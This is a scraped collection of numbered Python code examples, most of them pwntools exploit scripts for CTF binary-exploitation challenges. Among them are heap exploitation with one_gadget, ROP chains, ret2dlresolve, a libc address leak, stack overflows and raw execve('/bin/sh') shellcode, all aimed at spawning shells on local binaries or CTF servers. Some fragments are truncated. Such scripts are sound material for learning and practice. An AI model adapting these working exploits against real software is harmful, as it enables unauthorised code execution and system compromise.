示例#1
0
	def start_debugger(self):
		print "\n[*] iteration: %d" %self.iteration
		
		#퍼징 대상 어플리케이션 로드 및 seed 값 전달
		pwn.process([self.exe,self.seed]).wait()
		#os.system(self.exe+" "+self.seed)
		
		#core파일이 생기면 count 횟수에 맞춰 이름을 변경하고 crashes 디렉터리로 옮김
		if os.path.isfile("core"):
			print "\n[**] sementation fault is detected"

			if os.path.isdir("crashes") is not True:
				os.system("mkdir crashes")
			else:
				pass
			core="core"+str(self.count)
			os.system("mv core "+core)
			os.system("mv "+core+" crashes")			
			self.count+=1
示例#2
0
def exploit(*, remote=True, host="127.0.0.1", port=4242):
    print("Please: socat TCP-LISTEN:8080 openssl-connect:SERVER_HERE:4242,cert=client.pem,cafile=server.crt,verify=0")
    # socat -d TCP-LISTEN:1234,reuseaddr,fork openssl-connect:ctf.hexpresso.fr:4242,cert=client.pem,cafile=server.crt,verify=0
    if remote:
        p = pwn.remote(host, port)
    else:
        p = pwn.process("./heapme", env={"LD_PRELOAD":"/root/veille/challenge/ctf/FIC_Hexpresso_2019_quals/pwn/secret_ressources/libc-2.23.so"})
        # p.interactive()


    # 0xf1147 execve("/bin/sh", rsp+0x70, environ)
    # constraints:
    #   [rsp+0x70] == NULL
    one_gadget_rce = 0xf1147

    print("[+] Fill memory")
    for i in range(70, 80):
        create_disk(p, i, 32)
        print("B")
        write_disk(p, i, b"A" * 32)

    create_disk(p, 42, 16)

    print("[+] Fill freelist")
    for i in range(70, 80):
        delete_disk(p, i)

    print("#" * 100)
    for i in range(80, 100):
        create_disk(p, i, 16)

    print("Leak " + "#" * 100)
    print("=> 3 leak buffer of [5]")
    _, heap_leak = read_disk(p, 73)
    one_gadget_ptr_offset = heap_leak + 0x700

    print("Leak main_arena ".ljust(100, "#"))
    create_disk(p, 50, 0x400)
    create_disk(p, 51, 16)
    delete_disk(p, 50)

    create_disk(p, 50, 16)
    _, main_arena = read_disk(p, 50)
    print(f"main_arena = {main_arena:x}")
    libc_base = main_arena - 0x3c4b98
    print(f"libc_base = {libc_base:x}")
    one_gadget_rce += libc_base
    print(f"one_gadget_rce = {one_gadget_rce:x}")

    print("Upload one_gadget_rce ".ljust(100, "#"))
    create_disk(p, 50, 100)
    write_disk(p, 50, pwn.p64(one_gadget_rce)[:6])
    read_disk(p, 50)

    print("Overwrite ".ljust(100, "#"))
    print("=> 12 => overwrite [4] Disk")
    write_disk(p, 82, pwn.p64(one_gadget_ptr_offset))

    p.sendline("1")
    p.sendline("74")

    p.interactive()
示例#3
0
from pwn import remote, process

io = process('./pwn07')

payload = b'AAAAAAAA\xa4\x00\x00\x00\x85\x00\x00\x00'

io.recv()
io.send(payload)

io.interactive()
示例#4
0
        cmds = [
            # "heap-analysis-helper",
            # "format-string-helper",
            # gdb_load_symbols_cmd(dbg_file, libc, r.libs()[libc.path]),
            # "bp * $_base() + 0x1337",
        ]
        gdb.attach(r,
                   '\n'.join(["break *{:#x}".format(x) for x in bkps] + cmds))
    return


def exploit(r):
    # r.sendlineafter(b"> ", b"HelloPwn" )
    r.interactive()
    return 0


if __name__ == "__main__":
    if len(sys.argv) >= 2:
        LOCAL = False
        context.log_level = "info"
        r = remote(sys.argv[1], int(sys.argv[2]))
    else:
        r = process([
            elf.path,
        ])  #, env={"LD_PRELOAD": libc.path})
        attach(r)
        # or
        #r = gdb.debug([elf.path, ], gdbscript='')
    exit(exploit(r))
import pwn

host = "127.0.0.1"
port = 1337

remote = False

binary_path = './vuln'
libc_path = './libc.so.6'
ld_path = "./ld-2.27.so"
binary = pwn.ELF(binary_path)
libc = pwn.ELF(libc_path)
rop_binary = pwn.ROP(binary)

if remote:
    r = pwn.remote(host, port)
else:
    # r = pwn.process(binary_path)
    r = pwn.process([ld_path, binary_path], env={"LD_PRELOAD": libc_path})

r.interactive()

r.close()
示例#6
0
from pwn import p32
from pwn import u32
from pwn import process
from pwn import gdb
from pwn import context

ret2win_offset = 0x1f7
fhf_plt = 0x80485f0

context.terminal = ['xterm', '-e', 'sh', '-c']

p = process("./pivot32")
p.recvline()
p.recvline()
p.recvline()
p.recvline()
MA = p.recvline()[-11:].strip("\n") # Get address of fake stack write

print("[+] Mapped segment writing to: {}".format(MA))

# Fake Stack Written to Mapped Section
buf = p32(fhf_plt)
buf += p32(0x080488c0) # 0x080488c0: pop eax; ret;
buf += p32(0x804a024) # fhf_got
buf += p32(0x80488c4) # 0x080488c4: mov eax, dword ptr [eax]; ret;
buf += p32(0x08048571) # 0x08048571: pop ebx; ret;
buf += p32(ret2win_offset) # 0x1f7
buf += p32(0x80488c7) # 0x080488c7: add eax, ebx; ret;
buf += p32(0x080486a3) # 0x080486a3: call eax;
buf += p32(0xdeadbeef) # Show end of fake stack
示例#7
0
 def __init__(self, remote, binary=None, libc=None, host=None, port=None, *a, **kw):
     if not remote:    # Local binary
         self.tube = pwn.process(binary, *a, **kw) if libc is None else \
                 pwn.process(binary, env={'LD_PRELOAD': libc}, *a, **kw)
     else:             # Remote challenge
         self.tube = pwn.remote(host, port)
示例#8
0
 def _init(self):
     self._process = process([environ["SHELL"], "-i", "-c", self._procname + " -q"])
     self._process.recvrepeat(0.3)
     self.send("set confirm off")
     self._loadfile()
示例#9
0
    c = ''
    c += pwn.pack(buf2_address)  # rbp = buf2_address
    c += pwn.pack(0x00000000004006b3)  # pop rdi
    c += pwn.pack(buf2_address + 32)  # */bin/sh
    c += pwn.pack(system_address)
    c += '/bin/sh\x00'

    return c


if __name__ == '__main__':
    if pwnlib.args.args['REMOTE']:
        p = pwn.connect('csie.ctf.tw', 10132)
    else:
        p = pwn.process('./migr4ti0n-5b1ebb81d74911197f610391688c934210d79274')

    libc = pwn.ELF('./libc.so.6-14c22be9aa11316f89909e4237314e009da38883')

    payload1 = 'a' * 48 + ropchain_1()

    pwn.gdb.attach(p, gdbscript='b *0x40064a')  # + str(hex(buf1_address)))

    p.send(payload1)
    p.sendline(ropchain_2())

    print p.recvline()  # try your best
    puts_got = p.recvline()
    puts_got = pwn.u64(puts_got[:-1].ljust(8, '\x00'))
    print hex(puts_got)
from pwn import ELF, process, ROP, remote, ssh, gdb, cyclic, cyclic_find, log, p64, u64  # Import pwntools

####################
#### CONNECTION ####
####################
LOCAL = False
REMOTETTCP = True
REMOTESSH = False
GDB = False

LOCAL_BIN = "./vuln"
REMOTE_BIN = "~/vuln"  #For ssh
LIBC = ""  #ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it

if LOCAL:
    P = process(LOCAL_BIN)  # start the vuln binary
    ELF_LOADED = ELF(LOCAL_BIN)  # Extract data from binary
    ROP_LOADED = ROP(ELF_LOADED)  # Find ROP gadgets

elif REMOTETTCP:
    P = remote('10.10.10.10', 1339)  # start the vuln binary
    ELF_LOADED = ELF(LOCAL_BIN)  # Extract data from binary
    ROP_LOADED = ROP(ELF_LOADED)  # Find ROP gadgets

elif REMOTESSH:
    ssh_shell = ssh('bandit0',
                    'bandit.labs.overthewire.org',
                    password='******',
                    port=2220)
    p = ssh_shell.process(REMOTE_BIN)  # start the vuln binary
    elf = ELF(LOCAL_BIN)  # Extract data from binary
示例#11
0
#!/usr/bine/env python

import pwn
import r2pipe
import json

bin = './crackme0x00'

r = r2pipe.open(bin)
t = pwn.process(bin)

token = r.cmdj('izj')[2]['string'].decode('base64')

print '[+] Using {} as the password'.format(token)

t.readline()
t.sendline(token)
print t.readline()
示例#12
0
import pwn

BINARY = "{{ binary }}"
REMOTE = ("{{ remote_host }}", {{ remote_port }})

if pwn.args['REMOTE']:
    p = pwn.remote(REMOTE[0], REMOTE[1])
    elf = pwn.ELF(BINARY)
    {% if libc is not none %}libc = pwn.ELF("{{ libc['REMOTE'] }}"){% endif %}
else:
    p = pwn.process(BINARY)
    elf = p.elf
    {% if libc is not none %}libc = pwn.ELF("{{ libc['LOCAL'] }}"){% endif %}

def ropchain(chain, save=None):
    def flatten(arr):
        s = []
        for e in arr:
            if isinstance(e, list):
                s += flatten(e)
            else:
                if isinstance(e, int):
                    e = pwn.p32(e)
                s.append(e)
        return s

    rop = b''.join(flatten(chain))

    if save is not None:
        with open(save, 'wb') as w:
            w.write(rop + b'\n')
示例#13
0
#!/usr/bin/env python2

import pwn

remote = True

flag = ""
last_char = ""
index = 0

while last_char != '}':
    if remote:
        r = pwn.remote("babytrace.quals2019.oooverflow.io", 5000)
    else:
        r = pwn.process("pitas.py")

    # Header
    r.recvuntil("# Are you ready for the PITA?\n\n")

    # Binary select
    r.recvuntil("Choice: ")
    r.sendline("2")

    # start trace
    r.recvuntil("Choice: ")
    r.sendline("1")

    # add input constraint
    r.recvuntil("Choice: ")
    r.sendline("3")
    # r.sendline("input")
示例#14
0
from roputils import *
from pwn import process

binary = 'xdctf-pwn200'
r = process(binary)

rop = ROP(binary)

offset = 112
bss_base = rop.section('.bss')

buf = rop.fill(offset)
buf += rop.call('read', 0, bss_base, 100)
# after using read to construct our symtab in .bss + 20, we use dl_resolve to call it
buf += rop.dl_resolve_call(bss_base + 20, bss_base)
r.send(buf)

# over here we just fill in .bss with the data we need
buf = rop.string('/bin/sh')
buf += rop.fill(20, buf)
buf += rop.dl_resolve_data(bss_base + 20, 'system')
r.send(buf)

r.interactive() 
示例#15
0
from roputils import *
from pwn import process
from pwn import gdb
from pwn import context
r = process('./main')
context.log_level = 'debug'
r.recv()

rop = ROP('./main')
offset = 112
bss_base = rop.section('.bss')
buf = rop.fill(offset)

buf += rop.call('read', 0, bss_base, 100)
# used to call dl_Resolve()
buf += rop.dl_resolve_call(bss_base + 20, bss_base)
r.send(buf)

buf = rop.string('/bin/sh')
buf += rop.fill(20, buf)
# used to make faking data, such relocation, Symbol, Str
buf += rop.dl_resolve_data(bss_base + 20, 'system')
buf += rop.fill(100, buf)
r.send(buf)
r.interactive()
示例#16
0
import os
os.environ['TMPDIR'] = os.path.join(os.environ['HOME'], 'tmp')

import pwn
from struct import pack

remote_binary = "./vuln"
pr = pwn.process(remote_binary)

def segfault():
    """
    find offset with pwn.cyclic
    """
    ofs = pwn.cyclic_find(pwn.p32(0x61616168))

    payload = b"A" * ofs + create_ropgadget()
    pr.sendlineafter("Can you ROP your way out of this one?\n", payload)
    pr.interactive()

def create_rop():
    binary = pwn.ELF.from_assembly(
            "pop eax;pop ebx;pop ecx"
            )
    rop = pwn.ROP(binary)#remote_binary)
    return rop.chain()

def create_ropgadget():
    # execve generated by ROPgadget
    # ROPgadget --binary ./vuln  --ropchain --badbytes 0a
    # Padding goes here
    p = ''
示例#17
0
    gc();
    d = new Date(oo);
    str.concat(ooo);
    ''' % payload.__repr__()[1:-1]

    r.send(oneline(js_payload) + '\n')


remote_addr = None

binary_filename = './build/debug/js'

if remote_addr:
    r = pwn.remote(*remote_addr)
else:
    r = pwn.process(binary_filename, aslr=0)
pwn.context.terminal = ['tmux', 'splitw', '-h']

# find useful offsets in binary

binary = pwn.ELF(binary_filename)

sentinel_offset = binary.symbols['sentinel']
realloc_got_offset = binary.got['realloc']

# find useful offsets in libc

libc = pwn.ELF('/lib/x86_64-linux-gnu/libc.so.6')
realloc_offset = libc.symbols['realloc']
system_offset = libc.symbols['system']
gets_offset = libc.symbols['gets']
示例#18
0
from pwnlib import shellcraft
from pwnlib.args import args
from pwn import connect, process, p64, asm

shellcode = shellcraft.amd64.linux.sh()
shellcode = asm(shellcode, arch='amd64', os='linux')
print len(shellcode)

payload = 'x' * 248 + p64(0x601080)
if args['REMOTE']:
    p = connect('csie.ctf.tw', 10126)
else:
    p = process('./ret2sc-a6a74cce51b034b6570e5416a38973c195d1b414')
p.sendline(shellcode)
p.sendline(payload)
p.interactive()
示例#19
0
文件: exp.py 项目: Winter3un/ctf_task
from roputils import *
import pwn
# pwn.context(log_level="debug")
fpath = "./pwn1"
offset = 504

rop = ROP(fpath)
# print rop.fpath
# p = Proc(rop.fpath)
p = pwn.process(rop.fpath)
# p = pwn.remote("127.0.0.1",12346)
pwn.gdb.attach(p,"b*0x804859c\nc")

# addr_bss = rop.section('.bss')
addr_bss = 0x0804A080
# buf = rop.retfill(offset)


# buf = rop.dl_resolve_call(addr_bss+0x110, addr_bss)#
# buf += p32(addr_bss+len(buf)+0x10+0x4)
# buf += 'a'*0x10
# buf += rop.string('/bin/sh')

# buf += (0x110-len(buf))*'a'
# buf += rop.dl_resolve_data(addr_bss+0x110, 'system')
# buf += (0x1f4-len(buf))*'a'
buf =  p32(0x0804A080+4)+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
buf += (0x1f4-len(buf))*'a'
p.send(buf)

示例#20
0
import pwn
import struct
import time
import subprocess
import re

LOCAL = False

if LOCAL:
    sh = pwn.process('hive')
else:
    sh = pwn.remote('104.196.102.240', 5000)

def get_timestamp_hash (timestamp) :
    proc = subprocess.Popen('./hive_patched', stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
    stdout, stderr = proc.communicate(struct.pack('<L', timestamp))
    return stdout[-33:]

def login(sh):
    initial = sh.recv(1024)
    timestr = re.findall('time is: (.*?),', initial)[0]
    print '[+] timestr', timestr
    timehash = get_timestamp_hash(int(timestr))
    print '[+] timehash', timehash

    sh.sendline('username')
    sh.sendline('5up3rm@n')
    sh.sendline(timehash)

def build_rop():
    pack = struct.pack    
示例#21
0
              optimizer=keras.optimizers.Adam(lr=1e-2),
              metrics=['accuracy'])
model.fit(X, Y, epochs=300)
y_pred = model.predict(X)
print(y_pred, Y)
response = ''.join([chr(int(256 * a)) for a in y_pred.ravel()])
print('Response is ... ', response)

print("IT'S MORE EASY THAN TATH!")
print(
    "Just put to 0 everythng, invert ouput function and assign only bias term."
)
bias = [np.log(i / (1 - i)) for i in y]
#bias = [-0.41197978912935806, -0.31508104663989539, -0.49419322371684876, -0.39570893316279959]

print(bias)
conn = process('Challenge/Pilgrim/NNawkward_pilgrim')
conn.sendline('1')
conn.sendline('3')
conn.sendline()
for _ in range(16):
    conn.sendline('0')
conn.sendline('4')
conn.sendline()
for i in range(4):
    conn.sendline('0')
for i in range(4):
    conn.sendline('%.14f' % bias[i])
conn.sendline('2')
conn.interactive()
示例#22
0
#!/usr/bin/env python
import pwn

libc = pwn.ELF('libc.so')
elf_Demo = pwn.ELF('Demo')

attack = pwn.process('./Demo')
# attack = remote('127.0.0.1', 23333)

plt_write = elf_Demo.symbols['write']
print '###### plt_write = ' + hex(plt_write)

got_write = elf_Demo.got['write']
print '###### got_write = ' + hex(got_write)

overflow_addr = 0x08048471
print '###### overflow_addr = ' + hex(overflow_addr)

payload = 140 * 'a'
payload += pwn.p32(plt_write)
payload += pwn.p32(overflow_addr)
payload += pwn.p32(1)
payload += pwn.p32(got_write)
payload += pwn.p32(4)

print "[1] Sending payload"
attack.send(payload)

print "[2] Receiving addr_write"
addr_write = pwn.u32(attack.recv(4))
print 'addr_write = ' + hex(addr_write)
示例#23
0
#!/usr/bin/python
import pwn

payload = b"A" * 40 + pwn.pack(0x0804851b, 32) + b"\n"
payload2 = b"AAAAAAAAAAAAAAAAAAA\n"
p = pwn.process("./kanagawa")
#p = pwn.remote("challs.dvc.tf", 4444)
p.send(payload)
print(p.recv())
p.send(payload2)
print(p.recv())
示例#24
0
def local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if pwn.args.GDB:
        return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return pwn.process([exe.path] + argv, *a, **kw)
def startIt():
    global p
    global fmtStr
    p = process(os.path.join(SCRIPTDIR,fName),buffer_fill_size=0xffff)
    p.recvuntil("Input: ")
    fmtStr = FormatString(exec_fmt,elf=elf)
示例#26
0
 def __init__(self, pdir):        
     print colored('>> Happy pwning !', 'cyan')
     self.conn = pwn.process(pdir)
示例#27
0
文件: exploit.py 项目: iptq/CSCI5271
from pwn import process
from tempfile import NamedTemporaryFile

with NamedTemporaryFile() as f:
    f.write("Hello.")
    p = process(["/usr/bin/sudobcvi", f.name])
    p.sendline("r")
    print p.recv(1024)
示例#28
0
    print("New email:")
    hexdump(email)
    print()

if len(sys.argv) > 1:
    # Only do the IO stuff if we run with args (doesn't matter what).
    # This is so we can test the functions above without intializing pwntools
    # every time.

    if sys.argv[1] == 'r':
        # Run on remote
        p = pwn.remote('chal.2020.sunshinectf.org', port=10001)
    else:
        # Debug local process
        p = pwn.process('./runpeg -p peg_rev_checker.so LicenseChecker.peg -d',
                        shell=True)

        p.recvuntil('EAR debugger')
        p.sendline('')
        p.recvuntil('(dbg) ')

        p.sendline('b 0x01E8')
        p.sendline('c')

    p.recvuntil('Email: ')
    p.send(email)

    p.recvuntil('License key: ')
    license = b''.join(license)
    p.send(license)
示例#29
0
import pwn
import re
import os

elf = pwn.ELF('./be-quick-or-be-dead-2')

fib_number = 4368447739709774716003881551397205159088952756411141941533814668901464054869881997817744932743716769887780898920209866426445447485522551760777962122217963045451173078851717190916177144613851841799958503738854017612313939353

# modifying alarm function to do nothing using 'ret'
elf.asm(elf.symbols['alarm'], 'ret')
# modifying 'calculate_key function to return the number after changing it into 32-bits, Hopper can be used to find the function name and fib_number
elf.asm(elf.symbols['calculate_key'],
        'mov eax,%s\nret\n' % (hex(fib_number & 0xFFFFFFFF)))
# saving to new binary
elf.save('./new')
os.system('chmod +x ./new')

p = pwn.process('./new')
prompt = p.recvall()
flag = re.findall('\n(.*)', prompt)[5]
print flag
示例#30
0
import pwn

# Setup enviroment
process = pwn.process("./split")
pwn.context(os="linux", arch="amd64")
elf = pwn.ELF("split")
rop = pwn.ROP(elf)

rop.system(next(elf.search("cat flag")))
print str(rop.dump())

process.readline()
process.readline()
process.readline()
payload = "A" * 40 + rop.chain()
print payload
process.sendline(payload)
process.readline()
print process.readline()[2:]
process.shutdown()
示例#31
0
"""

# NOTES:
# It's not pretty, but it worked.
# Comments + slight modifications added post-solve.
# export PROG='/bin/ls' before running to mimic server environment.

if not ONLINE:
    LIBC_PATH = "/lib/i386-linux-gnu/libc.so.6"

    if GDB_BEGIN:
        log("Starting with GDB BEGIN")
        c = pwn.gdb.debug(BINARY_PATH, GDB_SCRIPT)
    else:
        log("Starting \"{}\"".format(BINARY_PATH))
        c = pwn.process(BINARY_PATH)
        if GDB_DEBUG:
            log("Attaching GDB")
            pwn.gdb.attach(c, GDB_SCRIPT)
else:
    LIBC_PATH = "./libc-2.27.so"
    c = pwn.connect(HOST, PORT)

LIBC = pwn.ELF(LIBC_PATH)


# Really gross way of parsing out the leaked data...
def grossLeak(leak, payload):
    try:
        # Get what we're interested in.
        leak = "'$'".join(
示例#32
0
文件: exploit.py 项目: magical/ctf
import pwn
#p = pwn.remote("chall.pwnable.tw", 10000)
p = pwn.process("./start")
output = p.recv(20)

# 20 bytes | return address | esp | ->saved esp points here<-
payloud = "a" * 20 + pwn.p32(0x8048087)
p.send(payloud)

output = p.recv(20)
esp = pwn.u32(output[:4])
pwn.log.info("output: " + repr(output))
pwn.log.info("leaked esp: {}".format(hex(esp)))

#shellcode = open("hello.bin",  'rb').read()
shellcode = open("nasm.bin", 'rb').read()
#shellcode = "1\xc0\xb0\x0b1\xc91\xbd2Rhn/shh//bi"

# second time through:
# 20 bytes | return address | esp                v points at byte 4 of 20
# xxxxxxxx   xxxxxxxxxxxxxx | 20 more bytes...   :            | eip | shellcode

# our second payload is written starting where esp used to be stored,
# which is at esp-4

ecx = esp - 4
payload = "a" * 20 + pwn.p32(ecx + 24) + shellcode
assert len(payload) < 0x3c
p.send(payload)

#print(p.read(4))
示例#33
0
#!/usr/bin/env python3

import pwn

rem = pwn.process('./unlink')
stack_addr = int(rem.recvline().split()[5], 0)
heap_addr = int(rem.recvline().split()[5], 0)

ret_addr = stack_addr + 0x28
jmp_addr = heap_addr + 0x20
shell_func = 0x080484eb

pwn.context.arch = 'i386'
shellcode = pwn.asm('''
	jmp safe
	nop
	nop
	nop
	nop
safe:
	push 0x080484eb
	ret
''')
payload = b'A' * 16 + pwn.p32(heap_addr) + pwn.p32(stack_addr) + shellcode
pwn.pause()

rem.sendline(payload)

rem.interactive()
示例#34
0
#!/usr/bin/env python
import pwn
import re

p = pwn.process(['./jmper'])
pwn.context.terminal = ['tmux', 'splitw', '-h', '-p', '75']

stdouttosys = -0x17bba0


def add_student(n=1):
    for i in range(n):
        p.recvuntil(":)")
        p.sendline("1")
    return


def name_student(ID, name, sen=0):
    p.recvuntil(":)")
    p.sendline("2")
    p.recvuntil("ID:")
    p.sendline(str(ID))
    p.recvuntil("name:")
    if sen == 0:
        p.sendline(name)
    else:
        p.send(name)
    return


def write_memo(ID, memo, sen=0):
示例#35
0
def runchain(exe, ch):
    proc = pwn.process(exe)
    proc.sendline(ch)
    return proc.recvall()
示例#36
0
#!/usr/bin/env python3

import pwn

if pwn.args['LOCAL']:
    io = pwn.process(['./alive_note'])
else:
    io = pwn.remote('chall.pwnable.tw', 10300)

elf = pwn.ELF('./alive_note')

#shellcode = pwn.asm('''
#xor al, 0x32
#xor al, 0x33
#xor al, 0x34
#xor al, 0x35
#''')
shellcode0 = 'PYjAXEqH'
shellcode1 = '4AHEEEqH'


def add_note(index, data, pad=False):
    io.recvuntil('Your choice :')
    io.sendline(str(1))
    io.recvuntil('Index :')
    io.sendline(str(index))
    io.recvuntil('Name :')
    io.sendline(data)
    if not pad:
        for i in range(3):
            add_note(9, 'A' * 8, True)
示例#37
0
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08054370) # xor eax, eax ; ret
#p += pack('<I', 0x080a18cd) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x08065952) # mov dword ptr [edx], eax ; ret

p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x0806e971) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080ea060) # padding without overwrite ebx
p += pack('<I', 0x0806e94a) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08054370) # xor eax, eax ; ret
p += pack('<I', 0x0807b39f) # inc eax ; ret
p += pack('<I', 0x0807b39f) # inc eax ; ret
p += pack('<I', 0x0807b39f) # inc eax ; ret
p += pack('<I', 0x0807b39f) # inc eax ; ret
p += pack('<I', 0x0807b39f) # inc eax ; ret
p += pack('<I', 0x0807b39f) # inc eax ; ret
p += pack('<I', 0x0807b39f) # inc eax ; ret
p += pack('<I', 0x0807b39f) # inc eax ; ret
p += pack('<I', 0x0807b39f) # inc eax ; ret
p += pack('<I', 0x0807b39f) # inc eax ; ret
p += pack('<I', 0x0807b39f) # inc eax ; ret
p += pack('<I', 0x080493f1) # int 0x80

r = process('./pratice4')
r.recvuntil('name ?')
r.sendline(p)
r.interactive()
示例#38
0
文件: hax.py 项目: bittorrent3389/ctf
import re

import pwn


CANARY = 0x8049D68

USE_GDB = False

if USE_GDB:
    p = pwn.process(['gdb', './www'])
    _ = p.recvuntil('gdb-peda$ ')
    p.sendline('b strcmp')
    _ = p.recvuntil('gdb-peda$ ')
    p.sendline('r')
    # Adjust amount of recvlines if necessary.
    print p.recvline()
    print p.recvline()
    print p.recvline()
    print p.recvline()
else:
    p = pwn.process('./www')

_ = p.recvline()

buffer_line = p.recvline().rstrip('\n')
m = re.match(r"buffers at 0x([a-f0-9]+) and 0x([a-f0-9]+)", buffer_line)
b1_address = int(m.group(1), 16)
b2_address = int(m.group(2), 16)
pwn.log.info("Buffers at {:08x} and {:08x}".format(b1_address, b2_address))